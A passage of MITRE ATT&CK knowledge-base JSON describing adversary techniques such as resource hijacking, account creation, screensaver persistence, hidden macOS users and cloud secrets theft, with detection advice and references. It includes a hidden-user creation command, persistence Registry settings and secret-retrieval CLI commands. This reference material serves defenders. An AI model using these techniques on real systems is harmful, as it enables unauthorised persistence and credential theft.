"description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.", "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-14T21:00:00.467Z", "name": "Resource Hijacking", "description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it\u2019s not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["David Fiser, @anu4is, Trend Micro", "Alfredo Oliveira, Trend Micro", "Jay Chen, Palo Alto Networks", "Magno Logan, @magnologan, Trend Micro", "Vishwas Manral, McAfee", "Yossi Weizman, Azure Defender Research Team", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS", "Containers"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "created": "2019-04-17T14:50:05.682Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1496", "external_id": "T1496"}, {"source_name": "Unit 42 Hildegard Malware", "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"}, {"source_name": "CloudSploit - Unused AWS Regions", "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.", "url": "https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc"}, {"source_name": "Sysdig Proxyjacking", "description": "Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.", "url": "https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/"}, {"source_name": "Kaspersky Lazarus Under The Hood Blog 2017", "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", "url": "https://securelist.com/lazarus-under-the-hood/77908/"}, {"source_name": "Trend Micro Exposed Docker APIs", "description": "Oliveira, A. (2019, May 30). Infected Containers Target Docker via Exposed APIs. Retrieved April 6, 2021.", "url": "https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html"}, {"source_name": "Trend Micro War of Crypto Miners", "description": "Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency Miners: A Battle for Resources. Retrieved April 6, 2021.", "url": "https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html"}, {"source_name": "GoBotKR", "description": "Zuzana Hromcov\u00e1. (2019, July 8). Malicious campaign targets South Korean users with backdoor\u2011laced torrents. Retrieved March 31, 2022.", "url": "https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:11.152Z", "name": "Valid Accounts", "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["User Account: User Account Authentication", "Logon Session: Logon Session Creation", "Logon Session: Logon Session Metadata"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0859", "external_id": "T0859"}, {"source_name": "Booz Allen Hamilton", "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-28T21:08:56.520Z", "name": "Establish Accounts", "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", "created": "2020-10-01T01:05:42.216Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1585", "external_id": "T1585"}, {"source_name": "Free Trial PurpleUrchin", "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"}, {"source_name": "NEWSCASTER2014", "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}, {"source_name": "BlackHatRobinSage", "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Obtain Capabilities", "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "created": "2020-10-01T01:56:24.776Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588", "external_id": "T1588"}, {"source_name": "NationsBuying", "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html"}, {"source_name": "PegasusCitizenLab", "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/"}, {"source_name": "DiginotarCompromise", "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/"}, {"source_name": "FireEyeSupplyChain", "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.", "url": "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop"}, {"source_name": "Analyzing CS Dec 2020", "description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.", "url": "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/"}, {"source_name": "Splunk Kovar Certificates 2017", "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"}, {"source_name": "Recorded Future Beacon Certificates", "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", "url": "https://www.recordedfuture.com/cobalt-strike-servers/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-07-28T18:17:34.185Z", "name": "Screensaver", "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Bartosz Jerzman"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "created": "2020-01-24T13:51:01.210Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/002", "external_id": "T1546.002"}, {"source_name": "ESET Gazer Aug 2017", "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.", "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"}, {"source_name": "Wikipedia Screensaver", "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.", "url": "https://en.wikipedia.org/wiki/Screensaver"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Hidden Users", "description": "Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1147", "external_id": "T1147"}, {"source_name": "Cybereason OSX Pirrit", "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-18T20:53:46.175Z", "name": "Conditional Access Policies", "description": "Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. \n\nBy modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Gavin Knapp", "Joshua Penny"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "SaaS", "IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", "created": "2024-01-02T13:43:37.389Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/009", "external_id": "T1556.009"}, {"source_name": "AWS IAM Conditions", "description": "AWS. (n.d.). IAM JSON policy elements: Condition. Retrieved January 2, 2024.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html"}, {"source_name": "GCP IAM Conditions", "description": "Google Cloud. (n.d.). Overview of IAM Conditions. Retrieved January 2, 2024.", "url": "https://cloud.google.com/iam/docs/conditions-overview"}, {"source_name": "JumpCloud Conditional Access Policies", "description": "JumpCloud. (n.d.). Get Started: Conditional Access Policies. Retrieved January 2, 2024.", "url": "https://jumpcloud.com/support/get-started-conditional-access-policies"}, {"source_name": "Microsoft Conditional Access", "description": "Microsoft. (2023, November 15). What is Conditional Access?. Retrieved January 2, 2024.", "url": "https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview"}, {"source_name": "Okta Conditional Access Policies", "description": "Okta. (2023, November 30). Conditional Access Based on Device Security Posture. Retrieved January 2, 2024.", "url": "https://support.okta.com/help/s/article/Conditional-access-based-on-device-security-posture?language=en_US"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Create Cloud Instance", "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", "created": "2020-05-14T14:45:15.978Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1578/002", "external_id": "T1578.002"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}, {"source_name": "AWS CloudTrail Search", "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.", "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/"}, {"source_name": "Azure Activity Logs", "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.", "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs"}, {"source_name": "Cloud Audit Logs", "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", "url": "https://cloud.google.com/logging/docs/audit#admin-activity"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Compile After Delivery", "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", "Praetorian"], "x_mitre_detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Static File Analysis", "Binary Analysis", "Anti-virus", "Host intrusion prevention systems", "Signature-based detection"], "x_mitre_permissions_required": ["User"], "x_mitre_system_requirements": ["Compiler software (either native to the system or delivered by the adversary)"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cf7b3a06-8b42-4c33-bbe9-012120027925", "created": "2019-04-25T20:53:07.719Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1500", "external_id": "T1500"}, {"source_name": "ClearSky MuddyWater Nov 2018", "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"}, {"source_name": "TrendMicro WindowsAppMac", "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-09-30T20:24:19.357Z", "name": "Cloud Secrets Management Stores", "description": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. \n\nSecrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables. \n\nIf an adversary is able to gain sufficient privileges in a cloud environment \u2013 for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets \u2013 they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)\n\n**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.", 